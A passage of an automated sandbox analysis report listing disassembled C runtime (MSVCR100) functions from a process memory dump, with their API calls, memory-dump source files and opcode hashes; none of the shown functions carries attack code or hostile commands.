                                                                                                          • _calloc_crt.MSVCR100(00000180,00000001,00000180,00000002,00000004), ref: 6FD8670A
                                                                                                          • _calloc_crt.MSVCR100(00000180,00000001,00000180,00000001,00000180,00000002,00000004), ref: 6FD86715
                                                                                                          • _calloc_crt.MSVCR100(00000101,00000001,00000180,00000001,00000180,00000001,00000180,00000002,00000004), ref: 6FD86724
                                                                                                          • GetCPInfo.KERNEL32(?,?), ref: 6FD86777
                                                                                                          • __crtLCMapStringA.MSVCR100(00000000,?,00000100,?,000000FF,?,000000FF,?,00000000), ref: 6FD867EE
                                                                                                          • __crtLCMapStringA.MSVCR100(00000000,?,00000200,?,000000FF,?,000000FF,?,00000000), ref: 6FD8681B
                                                                                                          • memcpy.MSVCR100(?,?,000000FE), ref: 6FD86875
                                                                                                          • memcpy.MSVCR100(?,?,0000007F,?,?,000000FE), ref: 6FD86884
                                                                                                          • memcpy.MSVCR100(?,?,0000007F,?,?,0000007F,?,?,000000FE), ref: 6FD86896
                                                                                                          • free.MSVCR100(?), ref: 6FD868EB
                                                                                                            • Part of subcall function 6FD8014E: HeapFree.KERNEL32(00000000,00000000,?,6FDA7602,00000000), ref: 6FD80164
                                                                                                          • free.MSVCR100(?,?), ref: 6FDB0A6E
                                                                                                          • free.MSVCR100(?,?,?), ref: 6FDB0A76
                                                                                                          • free.MSVCR100(?,?,?,?), ref: 6FDB0A7E
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: free$_calloc_crt$memcpy$String__crt$DecrementFreeHeapInfoInterlocked_malloc_crtmalloc
                                                                                                          • String ID:
                                                                                                          • API String ID: 4005881849-0
                                                                                                          • Opcode ID: 892eb334e232af968dac45b32a0372c560c669a22c0cffc2f00fc9dafd8b7d95
                                                                                                          • Instruction ID: aec83f036f0cc6ed522c1ac8f7b53c6ca72f2c1418cf0c22bb474dceef5bf84a
                                                                                                          • Opcode Fuzzy Hash: 892eb334e232af968dac45b32a0372c560c669a22c0cffc2f00fc9dafd8b7d95
                                                                                                          • Instruction Fuzzy Hash: ACB158B1900305DBEB50CFA4C995BEEBBF5BF0A304F04456EE5A5AB290DB35B845CB60
                                                                                                          Function 6FDD4A6E Relevance: 33.2, APIs: 22, Instructions: 160COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100(6FDD4C70,00000014,6FDD4C9E,?,?,00000000), ref: 6FDD4A8F
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(6FDD4C70,00000014,6FDD4C9E,?,?,00000000), ref: 6FDD4A9A
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • __p__iob.MSVCR100(6FDD4C70,00000014,6FDD4C9E,?,?,00000000), ref: 6FDD4AB1
                                                                                                          • __p__iob.MSVCR100(6FDD4C70,00000014,6FDD4C9E,?,?,00000000), ref: 6FDD4AC2
                                                                                                          • _fileno.MSVCR100(00000000,6FDD4C70,00000014,6FDD4C9E,?,?,00000000), ref: 6FDD4ACE
                                                                                                          • _errno.MSVCR100(?,?,?,6FDD4C70,00000014,6FDD4C9E,?,?,00000000), ref: 6FDD4B28
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(?,?,?,6FDD4C70,00000014,6FDD4C9E,?,?,00000000), ref: 6FDD4B33
                                                                                                          • __p__iob.MSVCR100(6FDD4C70,00000014,6FDD4C9E,?,?,00000000), ref: 6FDD4B44
                                                                                                          • __p__iob.MSVCR100(6FDD4C70,00000014,6FDD4C9E,?,?,00000000), ref: 6FDD4B4E
                                                                                                          • __p__iob.MSVCR100(6FDD4C70,00000014,6FDD4C9E,?,?,00000000), ref: 6FDD4B9F
                                                                                                          • __p__iob.MSVCR100(6FDD4C70,00000014,6FDD4C9E,?,?,00000000), ref: 6FDD4BA9
                                                                                                          • __p__iob.MSVCR100(6FDD4C70,00000014,6FDD4C9E,?,?,00000000), ref: 6FDD4BBA
                                                                                                          • _filbuf.MSVCR100(00000000,6FDD4C70,00000014,6FDD4C9E,?,?,00000000), ref: 6FDD4BC0
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __p__iob$_errno_invalid_parameter_noinfo$_filbuf_fileno_invalid_parameter
                                                                                                          • String ID:
                                                                                                          • API String ID: 1192782027-0
                                                                                                          • Opcode ID: 3e7aebc60d3baacf39b3f332e4243bcec60fd207569a1e16ec4e2d369333c0fa
                                                                                                          • Instruction ID: 82266db820a985f4ecb84052033aadb79fae8dbd6bcc0154698f42af78eb1f23
                                                                                                          • Opcode Fuzzy Hash: 3e7aebc60d3baacf39b3f332e4243bcec60fd207569a1e16ec4e2d369333c0fa
                                                                                                          • Instruction Fuzzy Hash: B851BD70915385CECB889FB8888066D7BB0BF17368B21475BF47A9B2E1DB34B041CB65
                                                                                                          Function 6FDF813C Relevance: 31.8, APIs: 21, Instructions: 270timepipeCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • __doserrno.MSVCR100(6FDF8488,00000064,6FDCFF68,000000FF,?), ref: 6FDF8161
                                                                                                          • _errno.MSVCR100(6FDF8488,00000064,6FDCFF68,000000FF,?), ref: 6FDF8168
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(6FDCFF68,000000FF,?), ref: 6FDF8173
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • memset.MSVCR100(?,00000000,00000030,6FDF8488,00000064,6FDCFF68,000000FF,?), ref: 6FDF8184
                                                                                                          • __doserrno.MSVCR100(6FDCFF68,000000FF,?), ref: 6FDF8191
                                                                                                          • _errno.MSVCR100(6FDCFF68,000000FF,?), ref: 6FDF8198
                                                                                                          • __doserrno.MSVCR100(6FDCFF68,000000FF,?), ref: 6FDF81B1
                                                                                                          • _errno.MSVCR100(6FDCFF68,000000FF,?), ref: 6FDF81B8
                                                                                                          • __doserrno.MSVCR100(6FDCFF68,000000FF,?), ref: 6FDF81E3
                                                                                                          • _errno.MSVCR100 ref: 6FDF8203
                                                                                                          • GetFileType.KERNEL32(00000000,6FDCFF68,000000FF,?), ref: 6FDF822A
                                                                                                          • GetLastError.KERNEL32 ref: 6FDF824C
                                                                                                          • _dosmaperr.MSVCR100(00000000), ref: 6FDF8253
                                                                                                          • PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 6FDF82B3
                                                                                                          • GetFileInformationByHandle.KERNEL32(?,?), ref: 6FDF82F9
                                                                                                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 6FDF833A
                                                                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 6FDF8350
                                                                                                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 6FDF83A0
                                                                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 6FDF83B6
                                                                                                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 6FDF8406
                                                                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 6FDF841C
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Time$File$__doserrno_errno$LocalSystem$ErrorHandleInformationLastNamedPeekPipeType_dosmaperr_invalid_parameter_invalid_parameter_noinfomemset
                                                                                                          • String ID:
                                                                                                          • API String ID: 495015257-0
                                                                                                          • Opcode ID: 380b48aab5dc66e2d475e1ee2fbf7164e7bf5e42ed53c9223f213f3fa827b33a
                                                                                                          • Instruction ID: c08f53c61d0a68c0326b94f77d398a5ad1be949d462bf48afe48232d873812a7
                                                                                                          • Opcode Fuzzy Hash: 380b48aab5dc66e2d475e1ee2fbf7164e7bf5e42ed53c9223f213f3fa827b33a
                                                                                                          • Instruction Fuzzy Hash: CBA1A071909B14DFDB60DFAAC944AAEB7F8FF09311B15462AE0A5DB190E734F441CB22
                                                                                                          Function 6FDF6DCB Relevance: 31.8, APIs: 21, Instructions: 259timepipeCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • __doserrno.MSVCR100(6FDF70F8,00000064,6FDCF1C9,000000FF,?), ref: 6FDF6DF0
                                                                                                          • _errno.MSVCR100(6FDF70F8,00000064,6FDCF1C9,000000FF,?), ref: 6FDF6DF7
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(6FDCF1C9,000000FF,?), ref: 6FDF6E02
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • memset.MSVCR100(?,00000000,00000024,6FDF70F8,00000064,6FDCF1C9,000000FF,?), ref: 6FDF6E13
                                                                                                          • __doserrno.MSVCR100(6FDCF1C9,000000FF,?), ref: 6FDF6E20
                                                                                                          • _errno.MSVCR100(6FDCF1C9,000000FF,?), ref: 6FDF6E27
                                                                                                          • __doserrno.MSVCR100(6FDCF1C9,000000FF,?), ref: 6FDF6E40
                                                                                                          • _errno.MSVCR100(6FDCF1C9,000000FF,?), ref: 6FDF6E47
                                                                                                          • __doserrno.MSVCR100(6FDCF1C9,000000FF,?), ref: 6FDF6E72
                                                                                                          • _errno.MSVCR100 ref: 6FDF6E92
                                                                                                          • GetFileType.KERNEL32(00000000,6FDCF1C9,000000FF,?), ref: 6FDF6EB9
                                                                                                          • GetLastError.KERNEL32 ref: 6FDF6EDB
                                                                                                          • _dosmaperr.MSVCR100(00000000), ref: 6FDF6EE2
                                                                                                          • PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 6FDF6F3F
                                                                                                          • GetFileInformationByHandle.KERNEL32(?,?), ref: 6FDF6F74
                                                                                                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 6FDF6FB5
                                                                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 6FDF6FCB
                                                                                                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 6FDF701B
                                                                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 6FDF7031
                                                                                                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 6FDF7081
                                                                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 6FDF7097
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Time$File$__doserrno_errno$LocalSystem$ErrorHandleInformationLastNamedPeekPipeType_dosmaperr_invalid_parameter_invalid_parameter_noinfomemset
                                                                                                          • String ID:
                                                                                                          • API String ID: 495015257-0
                                                                                                          • Opcode ID: 855bc2d212cecb5c44ce2332f3934ef33c1de9957328a81772997a8b3dec2ebb
                                                                                                          • Instruction ID: f3c942d9aaabba82fc33642ec8a68907df81fb3608cda5b08d788fa7477d9a88
                                                                                                          • Opcode Fuzzy Hash: 855bc2d212cecb5c44ce2332f3934ef33c1de9957328a81772997a8b3dec2ebb
                                                                                                          • Instruction Fuzzy Hash: 3AA17272905718DEDB60CFA4C944AEEB7F8EF0A310B11862AE066DB590E735F541DB21
                                                                                                          Function 6FDF7DCC Relevance: 30.3, APIs: 20, Instructions: 272timepipeCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • __doserrno.MSVCR100(6FDF8120,00000068,6FDA7DA5,000000FF,?), ref: 6FDF7DF1
                                                                                                          • _errno.MSVCR100(6FDF8120,00000068,6FDA7DA5,000000FF,?), ref: 6FDF7DF8
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(6FDA7DA5,000000FF,?), ref: 6FDF7E03
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • memset.MSVCR100(?,00000000,00000030,6FDF8120,00000068,6FDA7DA5,000000FF,?), ref: 6FDF7E14
                                                                                                          • __doserrno.MSVCR100(6FDA7DA5,000000FF,?), ref: 6FDF7E21
                                                                                                          • _errno.MSVCR100(6FDA7DA5,000000FF,?), ref: 6FDF7E28
                                                                                                          • __doserrno.MSVCR100(6FDA7DA5,000000FF,?), ref: 6FDF7E41
                                                                                                          • _errno.MSVCR100(6FDA7DA5,000000FF,?), ref: 6FDF7E48
                                                                                                          • _errno.MSVCR100 ref: 6FDF7E8E
                                                                                                          • GetFileType.KERNEL32(?,6FDA7DA5,000000FF,?), ref: 6FDF7EB5
                                                                                                          • GetLastError.KERNEL32 ref: 6FDF7ED7
                                                                                                          • _dosmaperr.MSVCR100(00000000), ref: 6FDF7EDE
                                                                                                          • PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 6FDF7F47
                                                                                                          • GetFileInformationByHandle.KERNEL32(?,?), ref: 6FDF7F7F
                                                                                                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 6FDF7FC1
                                                                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 6FDF7FD7
                                                                                                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 6FDF8033
                                                                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 6FDF8049
                                                                                                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 6FDF80A5
                                                                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 6FDF80BB
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Time$File$_errno$LocalSystem__doserrno$ErrorHandleInformationLastNamedPeekPipeType_dosmaperr_invalid_parameter_invalid_parameter_noinfomemset
                                                                                                          • String ID:
                                                                                                          • API String ID: 1107138500-0
                                                                                                          • Opcode ID: f0d740fb6855d55baa805d61fd7f9c5f1a580f1f3a214e2d18a2ca1b2887881a
                                                                                                          • Instruction ID: 8738f1e188891c2bf6fece16b092ea4e1f231bf532db9de718bf56bd73f21144
                                                                                                          • Opcode Fuzzy Hash: f0d740fb6855d55baa805d61fd7f9c5f1a580f1f3a214e2d18a2ca1b2887881a
                                                                                                          • Instruction Fuzzy Hash: B1B17FB1905715EECB60CFA9C8409EEB7F8BF09314B11462EE55ADB290E739F841CB21
                                                                                                          Function 6FDD23C7 Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 116COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100 ref: 6FDD23DF
                                                                                                          • _invalid_parameter_noinfo.MSVCR100 ref: 6FDD23EA
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • _errno.MSVCR100 ref: 6FDD240F
                                                                                                          • _invalid_parameter_noinfo.MSVCR100 ref: 6FDD241A
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno_invalid_parameter_noinfo$_invalid_parameter
                                                                                                          • String ID: PATH
                                                                                                          • API String ID: 1328987296-1036084923
                                                                                                          • Opcode ID: f1970bc085a3d7dbe18b22610e4fb937b64b0b3c669f9f4327e3060eb9e5d2ee
                                                                                                          • Instruction ID: c09d6062738182b4420e5da15d53232a1185fddad306b00c88c3f79161dbd4cf
                                                                                                          • Opcode Fuzzy Hash: f1970bc085a3d7dbe18b22610e4fb937b64b0b3c669f9f4327e3060eb9e5d2ee
                                                                                                          • Instruction Fuzzy Hash: FC31A271805708EBDB92AFA4CD80D8D3BB5AF4136DF214256F830AB1D0EB71BA909771
                                                                                                          Function 6FD91FBA Relevance: 28.7, APIs: 19, Instructions: 229COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • wcschr.MSVCR100(00000000,0000003D,7650DF80,00000000,00000000), ref: 6FD91FE5
                                                                                                          • free.MSVCR100(?,7650DF80,00000000,00000000), ref: 6FD92058
                                                                                                          • _errno.MSVCR100(7650DF80,00000000,00000000), ref: 6FD97450
                                                                                                          • _errno.MSVCR100(00000000), ref: 6FDB146B
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(00000000), ref: 6FDB1476
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno$_invalid_parameter_noinfofreewcschr
                                                                                                          • String ID:
                                                                                                          • API String ID: 655308977-0
                                                                                                          • Opcode ID: 5ee245bdb56e0da3510286ef0193e182249b74e682f7392791f27fa63dadf27f
                                                                                                          • Instruction ID: 64ae75237726fb702034aef895a14c5426253b668664597dfb4422d55b3fa7ec
                                                                                                          • Opcode Fuzzy Hash: 5ee245bdb56e0da3510286ef0193e182249b74e682f7392791f27fa63dadf27f
                                                                                                          • Instruction Fuzzy Hash: BF71B5B1505714EFCB528FB4D88199D7BB5EF06B28B21451FE426DB1D0EB30B981CBA1
                                                                                                          Function 6FD92144 Relevance: 28.7, APIs: 19, Instructions: 218COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _mbschr.MSVCR100(00000000,0000003D,00000000,00000000,7650DFF0), ref: 6FD9216B
                                                                                                            • Part of subcall function 6FD9212D: _mbschr_l.MSVCR100(00000000,00000000,00000000,?,6FD92170,00000000,0000003D,00000000,00000000,7650DFF0), ref: 6FD9213A
                                                                                                          • free.MSVCR100(00000000,00000000,00000000,7650DFF0), ref: 6FD921D2
                                                                                                          • _errno.MSVCR100(00000000,00000000,7650DFF0), ref: 6FD921E4
                                                                                                          • _errno.MSVCR100(7650DFF0), ref: 6FDB1B7B
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(7650DFF0), ref: 6FDB1B86
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno$_invalid_parameter_noinfo_mbschr_mbschr_lfree
                                                                                                          • String ID:
                                                                                                          • API String ID: 3491722712-0
                                                                                                          • Opcode ID: 3ea4d2a761e4bbe81f5903855198aa729097410990e8e3a87fc79181cdcfe07d
                                                                                                          • Instruction ID: dcf6889ad6198848244e0230e2d6b34ae0462b37fdf0366391c0b2e0453f286a
                                                                                                          • Opcode Fuzzy Hash: 3ea4d2a761e4bbe81f5903855198aa729097410990e8e3a87fc79181cdcfe07d
                                                                                                          • Instruction Fuzzy Hash: 3061B7B2905305DFDB909FA4DCC099D7BB1FF06328B21066ED665EB180DB307A91CB61
                                                                                                          Function 6FDCA728 Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 190threadCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 6FDC035A: TlsGetValue.KERNEL32(6FDB6175), ref: 6FDC036C
                                                                                                          • TlsGetValue.KERNEL32 ref: 6FDCA759
                                                                                                          • DebugBreak.KERNEL32 ref: 6FDCA763
                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 6FDCA79B
                                                                                                          • swprintf_s.MSVCR100(?,00000400,[%d:%d:%d:%d(%d)] %S: !!!!!!!Assert Failed(%S: %d),00000000), ref: 6FDCA7CB
                                                                                                          • fwprintf.MSVCR100(?), ref: 6FDCA80D
                                                                                                          • fflush.MSVCR100(?), ref: 6FDCA818
                                                                                                          • OutputDebugStringW.KERNEL32(?), ref: 6FDCA827
                                                                                                          • DebugBreak.KERNEL32 ref: 6FDCA82D
                                                                                                          • exit.MSVCR100(000000F8), ref: 6FDCA835
                                                                                                          Strings
                                                                                                          • [%d:%d:%d:%d(%d)] %S: !!!!!!!Assert Failed(%S: %d), xrefs: 6FDCA840, 6FDCA7BA
                                                                                                          • [%d] %S: !!!!!!!Assert Failed(%S: %d), xrefs: 6FDCA7E1
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Debug$BreakValue$CurrentOutputStringThreadexitfflushfwprintfswprintf_s
                                                                                                          • String ID: [%d:%d:%d:%d(%d)] %S: !!!!!!!Assert Failed(%S: %d)$[%d] %S: !!!!!!!Assert Failed(%S: %d)
                                                                                                          • API String ID: 179563127-813932914
                                                                                                          • Opcode ID: f35c1e3e050766d4aa292d5c001af008185e7e0c455ab2efb83a22e24dcfff4c
                                                                                                          • Instruction ID: 16304c651cc9698ba2ff9ba90fb402ac43830f407107f423d38326bb17f52f17
                                                                                                          • Opcode Fuzzy Hash: f35c1e3e050766d4aa292d5c001af008185e7e0c455ab2efb83a22e24dcfff4c
                                                                                                          • Instruction Fuzzy Hash: 8051EAB29083D49FDB42CFB48C685457FB8BF56214B0882DFE485DB1D2EB34A945CB62
                                                                                                          Function 6FDCEC76 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 105COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • __doserrno.MSVCR100(00000000,00000007,00000007,?,6FDCEDBF,00000000,?,?,6FDCEDE8,0000000C,6FDA7AFE,?,?), ref: 6FDCEC90
                                                                                                          • _errno.MSVCR100(00000000,00000007,00000007,?,6FDCEDBF,00000000,?,?,6FDCEDE8,0000000C,6FDA7AFE,?,?), ref: 6FDCEC9B
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(00000000,00000007,00000007,?,6FDCEDBF,00000000,?,?,6FDCEDE8,0000000C,6FDA7AFE,?,?), ref: 6FDCECA6
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • _getdrive.MSVCR100(00000000,00000007,00000007,?,6FDCEDBF,00000000,?,?,6FDCEDE8,0000000C,6FDA7AFE,?,?), ref: 6FDCECB2
                                                                                                          • _errno.MSVCR100(?,00000000,00000007,00000007,?,6FDCEDBF,00000000,?,?,6FDCEDE8,0000000C,6FDA7AFE,?,?), ref: 6FDCECC8
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(?,00000000,00000007,00000007,?,6FDCEDBF,00000000,?,?,6FDCEDE8,0000000C,6FDA7AFE,?,?), ref: 6FDCECD3
                                                                                                          • GetFullPathNameA.KERNEL32(0000002E,00000000,?,0000002E,?,?,00000000,00000007,00000007,?,6FDCEDBF,00000000,?,?,6FDCEDE8,0000000C), ref: 6FDCED1A
                                                                                                          • _errno.MSVCR100(?,?,00000000,00000007,00000007,?,6FDCEDBF,00000000,?,?,6FDCEDE8,0000000C,6FDA7AFE,?,?), ref: 6FDCED29
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
